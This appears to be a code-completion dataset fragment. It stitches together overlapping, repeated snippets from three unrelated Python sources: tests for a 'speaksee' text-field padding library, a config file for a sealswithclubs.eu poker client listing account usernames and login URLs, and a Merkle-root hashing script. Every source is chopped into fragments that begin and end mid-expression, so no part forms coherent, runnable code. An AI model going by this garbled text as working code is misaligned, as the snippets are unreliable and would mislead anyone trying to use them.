expected_lengths) # Test init_token and eos_token are properly handled.", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\",", "tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs))", "assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) ==", "== expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ]", "test_preprocessing(self): field = data.ImageField() image = '' expected_image = '' assert field.preprocess(image) ==", "expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\",", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) #", "\".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test", "minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch", "test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert", "\"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert", "= data.ImageField() image = '' expected_image = '' assert field.preprocess(image) == expected_image '''", "expected_padded_minibatch # Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch =", "init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "\"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) ==", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\",", "field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\")", "expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\",", "handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "[[0, 3, 2, 1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output", "\"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4,", "assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field = data.TextField(fix_length=4,", "[\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4]", "-*- coding: utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data as" ]
[ "'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH =", "SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL =", "= 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu'", "750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT", "'<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL", "Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO", "'/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres']", "= 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088", "USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL =", "BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO =", "= 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php'", "= 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH", "SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out'", "'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00'", "['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR =", "SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR", "SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3", "CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH =", "this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH =", "= '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7'", "= '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change", "Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt'", "'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL", "'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting", "HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR +", "'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0", "= 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR", "SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER", "'\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this", "= 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR +", "#Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH", "SWC_USERNAME = ['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18'", "<gh_stars>0 SWC_USERNAME = ['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL =", "8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED'", "'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH", "MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR", "SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR", "'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR =", "= '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres',", "path HH_PATH = BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR", "= 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER =", "END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/'", "= ['Irresonsibl','Irrsponsible', 'Irresponsibl'] SWC_PASSWORD = '<PASSWORD>' SLEEP_MILLISECONDS = 750 GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR", "= BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR + 'swc-api/Log", "= 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR = '\\x00' UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR =", "BASE_DIR + 'swc-api/outdir/' DB_INFO = ['swc','postgres', 'postgres'] CHAT_PATH = BASE_DIR + 'swc-api/Log Archives/'", "GET_SESSION_URL = 'https://sealswithclubs.eu/sealsloginhandler.php?login=X&JSON=1&Version=v0.2.18' USER_AGENT_STR = 'python-requests/1.1.0 CPython/2.7.3 Windows/7' SERVICE_URL = 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT =", "UNNAMED_HAND_IDENTIFIER = 'UNDEFINED' SITTINGOUT_STR = 'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path", "= 'sealswithclubs.eu'#'https://sealswithclubs.eu' SERVICE_PORT = 8088 MEANINGFUL_COLORS_URL = 'https://sealswithclubs.eu/meaningfulcolors.php' SWC_CERT_FILEPATH = 'sealswithclubs.eu.crt' END_STR =", "'Sitting Out' BASE_DIR = '/home/nonroot/Projects/' #Change this path HH_PATH = BASE_DIR + 'swc-api/outdir/'" ]
[ "StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) +", "% 2 != 0: hashes.append(hashes[-1]) i = 0 j = 0 while i", "+ 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i +=", "bitcoin core implementation ''' import pandas as pd from hashlib import sha256 from", "# h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4)", "transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes =", "h(2) ) + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset =", "0 j = 0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i]", "<filename>merkle.py<gh_stars>1-10 ''' Generate root merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as", "I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin", "root merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree -->", "from hashlib import sha256 from io import StringIO # h( h(1) + h(2)", "= pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) >", "len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j +=", "hashlib import sha256 from io import StringIO # h( h(1) + h(2) )", "as pd from hashlib import sha256 from io import StringIO # h( h(1)", "2 j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in", "i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i", "io import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h(", "BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas", "h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h(", "header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes)", "1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j =", "i += 2 j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree", "h(1) + h(2) ) + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766", "h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2", ") ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1", "implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as pd from", "python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new", "sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i", "0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1)", "as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation '''", "Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as pd", "# h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) +", "--> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as", "reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation ''' import", "h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1", "+ h(2) ) + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset", "= 0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i", "use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core", "+ h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2", "dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset,", "> 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j", "in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot --->", "93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df =", "import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3)", "''' Generate root merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as reference:", "merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi", "pandas as pd from hashlib import sha256 from io import StringIO # h(", "tree hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation", "1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes) / 2)] #", "sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes =", "while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest()", "x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1])", "+ h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3", "# b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h( h(3) +", "b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h( h(3) + h(4)", "+ 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes) / 2)]", "sha256 from io import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8", "j = 0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] +", "transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes", "hashes.append(hashes[-1]) i = 0 j = 0 while i + 1 < len(hashes):", "df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 !=", "+ hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes)", "import pandas as pd from hashlib import sha256 from io import StringIO #", "hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes = hashes[:int(len(hashes) /", ") # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h(", "< len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j", "h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2)", "new bitcoin core implementation ''' import pandas as pd from hashlib import sha256", "h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) #", ") # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\")", "h( h(1) + h(2) ) + h( h(3) + h(4) ) ) #", "len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j = 0 while", "1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2", "len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0", "h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) )", "pd from hashlib import sha256 from io import StringIO # h( h(1) +", "# h( h( h(1) + h(2) ) + h( h(3) + h(4) )", "# 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h(", "hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot", "transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:,", "while len(hashes) > 1: if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i =", "pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1:", "if len(hashes) % 2 != 0: hashes.append(hashes[-1]) i = 0 j = 0", ") # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) + h( h(3)", "encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if", "\"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while", "h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) )", "''' import pandas as pd from hashlib import sha256 from io import StringIO", "0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2 != 0:", "StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None)", "!= 0: hashes.append(hashes[-1]) i = 0 j = 0 while i + 1", "h( h( h(1) + h(2) ) + h( h(3) + h(4) ) )", "1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in a hash print(hashes[0])", "hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) %", "= sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1 hashes", "implementation ''' import pandas as pd from hashlib import sha256 from io import", "0 while i + 1 < len(hashes): hashes[j] = sha256(str(hashes[i] + hashes[i +", "= 0 j = 0 while i + 1 < len(hashes): hashes[j] =", "+= 2 j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed", "https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree --> Satoshi implmentation BlockMerkleRoot ---> new bitcoin core implementation", "df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes)", "= StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8',", "+ h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 # h( h( h(1) + h(2) ) +", "h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 # h( h(3) + h(4) ) # b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2 #", "import sha256 from io import StringIO # h( h(1) + h(2) ) #", ") + h( h(3) + h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\", "core implementation ''' import pandas as pd from hashlib import sha256 from io", "hashes[j] = sha256(str(hashes[i] + hashes[i + 1]).encode('utf-8')).hexdigest() i += 2 j += 1", "+ h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1", "transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist()", "= df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist() while len(hashes) > 1: if len(hashes) % 2", "2 != 0: hashes.append(hashes[-1]) i = 0 j = 0 while i +", "0: hashes.append(hashes[-1]) i = 0 j = 0 while i + 1 <", "j += 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in a", "h(4) ) ) # 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2", "from io import StringIO # h( h(1) + h(2) ) # 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8 #", "+= 1 hashes = hashes[:int(len(hashes) / 2)] # tree condensed in a hash", "transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda x:", "i = 0 j = 0 while i + 1 < len(hashes): hashes[j]", "transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df = pd.read_csv(dataset, encoding='utf-8', header=None) hashes = df.iloc[:, 0].apply(lambda", "---> new bitcoin core implementation ''' import pandas as pd from hashlib import", "# 